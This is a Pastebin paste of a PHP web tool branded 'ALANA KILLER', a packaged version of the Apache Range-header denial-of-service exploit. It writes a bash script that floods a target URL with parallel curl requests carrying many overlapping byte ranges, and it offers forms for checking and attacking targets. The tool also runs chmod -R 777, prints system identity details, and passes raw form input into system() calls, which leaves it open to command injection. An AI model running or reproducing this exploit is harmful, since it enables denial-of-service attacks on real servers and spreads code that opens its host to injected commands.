Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*
- Devoted my ex-girlfriend Kh. Alana[from Kagan city] (;
- k!ll m3 --- s4f3 the fuck'!n w0rldzzzzz
- S4(uR4, r00tw0rm __2011__
- w4tch u. h4ck u. fuck u.
- Pr!v8 2 Publ!c
- */
- error_reporting(0);
- `chmod -R 777 *`;
- ?>
- <html><head><title>~=4L4N4 K!LL3R by S4(uR4=~</title>
- <meta charset='utf-8'>
- </head><body bgcolor = "black">
- <font color='#969696'>
- <pre>
- 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
- 0 __ __ __ __ 1
- 1 /'__`\ /'__`\/\ \__ /'__`\ 0
- 0 _ __ /\ \/\ \/\ \/\ \ \ ,_\ __ __ __/\ \/\ \ _ __ ___ ___ 1
- 1 /\`'__\ \ \ \ \ \ \ \ \ \ \/ /\ \/\ \/\ \ \ \ \ \/\`'__\/' __` __`\ 0
- 0 \ \ \/ \ \ \_\ \ \ \_\ \ \ \_\ \ \_/ \_/ \ \ \_\ \ \ \/ /\ \/\ \/\ \ 1
- 1 \ \_\ \ \____/\ \____/\ \__\\ \___x___/'\ \____/\ \_\ \ \_\ \_\ \_\ 0
- 0 \/_/ \/___/ \/___/ \/__/ \/__//__/ \/___/ \/_/ \/_/\/_/\/_/ 1
- 1 0
- 0 1
- 1 <font color="red"> >> 4L4N4 K!LL3R</font> 0
- 0 >> author : S4(uR4 1
- 1 >> sanjar[at]xakep[dot]ru 0
- 0 >> Priv8 v.0.1 1
- 1 >> )c( 2011 0
- 0 1
- 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-0
- </pre></font>
- <h3><font color='555555'>[CHECK] (Vulned : "HTTP/1.1 206 Partial Content") ::</font></h3>
- <form action="index.php" method="POST">
- <font color="hack">TESTED URL : </font><input type="text" name="test_url"><br>
- <input type=submit value="Ch3ck 1t!">
- </form>
- <font color='red'>
- <?php
- echo "<br></pre>";
- //if(!empty($_POST[0])){
- echo "<br><font color='hack'>"."[+] Server Test Running : <pre>";
- echo "<br>";
- system('curl -I -H "Range : bytes=0-1,0-2" -s '.$_POST["test_url"]);
- echo "</pre>";
- ?>
- <h3><font color='555555'>[ATACK] ::</font></h3>
- <form action="index.php" method="POST">
- <font color='hack'>REQUEST : </font> <input type=text name="request"><br>
- <font color='hack'>THREADS : </font> <input type="text" name="threads"><br>
- <font color="hack">URL : </font><input type="text" name="url"><br>
- <input type=submit value="Fuck UP!">
- </form>
- <h3><font color='555555'>[LOG] ::</font></h3>
- <?php
- echo "<font color='555555'>PWD :: ".`pwd`;
- echo "<br>SYSTEM :: ".`uname -a`;
- echo "<br>ID :: ".`id`;
- echo "<br>DATE :: ".`date`."</font><br>";
- $tmp1 = "alana_kill3r.sh";
- `touch alana_kill3r.sh`;
- $apache_killer = <<<XPLOIT
- #!/bin/bash
- test "$1" == "" && echo $0 requests threads target-url && exit 0
- seq 1 $1 | xargs -I{} -P $2 curl -I -H "User-Agent:" \
- -H "Range: bytes=0-`printf ',5-%d' {10..1000}`" \
- --compress -s $3 | grep HTTP
- XPLOIT;
- if (is_writable($tmp1)) {
- if (!$handle = fopen($tmp1, 'w+')) {
- echo "<font color='red'>[x] Can't open file ($tmp1)</font>";
- exit;
- }
- if (fwrite($handle, $apache_killer) === FALSE) {
- echo "<font color='red'>[x] Can't write file ($tmp1)</font>";
- exit;
- }
- echo "<br><font color='hack'>"."[+] ALL OK, xpl0it Writed</font>";
- fclose($handle);
- } else {
- echo "<br><font color='red'>[x] File $tmp1 has not access to write</font>";
- }
- ?>
- <?php
- echo"<br><pre>";
- $pwd = "-al";
- system("ls ".$pwd);
- echo "<br></pre>";
- echo "<br><font color='hack'>"."[+] Xploit Started with : <pre>";
- `chmod +x`.$tmp1;
- echo "<br>root@r00tw0rm:$ ";
- system("bash ./".$tmp1." ".$_POST["request"]." ".$_POST["threads"]." ".$_POST["url"]);
- echo "</pre>";
- ?>
- </font>
- </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement